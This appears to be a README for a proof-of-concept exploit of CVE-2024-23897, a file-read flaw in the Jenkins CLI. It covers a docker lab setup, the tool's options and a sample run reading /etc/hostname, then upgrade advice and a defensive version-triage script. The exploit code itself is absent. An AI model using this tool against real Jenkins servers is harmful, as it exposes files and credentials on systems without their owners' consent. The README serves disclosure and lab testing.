# Jenkins CVE-2024-23897 PoC

A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.

**Affected Versions**

- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2

## Set up a vulnerable instance

Spin up a local vulnerable instance using docker compose:

```bash
cd docker
docker compose up -d
```

The instance will be available at `http://localhost:1234`

## Exploitation

โฏ python --help
usage: [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)


โฏ python --url '' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...

ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability, take a look at my blog post on the topic.

## Fix

- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the Jenkins security advisory
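
To triage a fleet against the affected and fixed versions listed on this page, the following added example (not part of this repository's PoC code) classifies Jenkins version strings, treating weekly (`2.441`) and LTS (`2.426.2`) release lines separately. The function names are hypothetical, and the hostnames and versions in `SAMPLE` are constructed.

```python
# Classify Jenkins version strings against the ranges listed on this page.
# Affected: weekly <= 2.441, LTS <= 2.426.2. Fixed: 2.442, LTS 2.426.3.
import re

LAST_AFFECTED_WEEKLY = (2, 441)
LAST_AFFECTED_LTS = (2, 426, 2)
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?$")

def parse_version(text):
    """Return a tuple of ints: 2 parts for a weekly release, 3 for LTS."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Jenkins version: {text!r}")
    return tuple(int(p) for p in m.groups() if p is not None)

def is_affected(text):
    """True if the version is in the affected range for its release line."""
    v = parse_version(text)
    if len(v) == 3:
        # LTS line: 2.426.3 is fixed even though 2.426 sorts below 2.441,
        # so a single numeric comparison would misreport it.
        return v <= LAST_AFFECTED_LTS
    return v <= LAST_AFFECTED_WEEKLY

def triage(inventory):
    """Map host -> 'affected' | 'fixed' | 'unknown' for a {host: version} dict."""
    result = {}
    for host, version in inventory.items():
        try:
            result[host] = "affected" if is_affected(version) else "fixed"
        except ValueError:
            result[host] = "unknown"  # e.g. snapshot builds: check by hand
    return result

# Constructed inventory (hostnames and versions are sample values).
SAMPLE = {
    "ci-weekly-old": "2.441",
    "ci-weekly-new": "2.442",
    "ci-lts-old": "2.426.2",
    "ci-lts-new": "2.426.3",
    "ci-custom": "2.440-SNAPSHOT",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE).items():
        print(f"{host}: {SAMPLE[host]} -> {status}")
```

Hosts reported as `unknown` carry a version string the parser does not recognise and need a manual check rather than being assumed fixed.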

## Related Links

- Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins
- Jenkins Security Advisory - 2024-01-24
- Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)
- CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability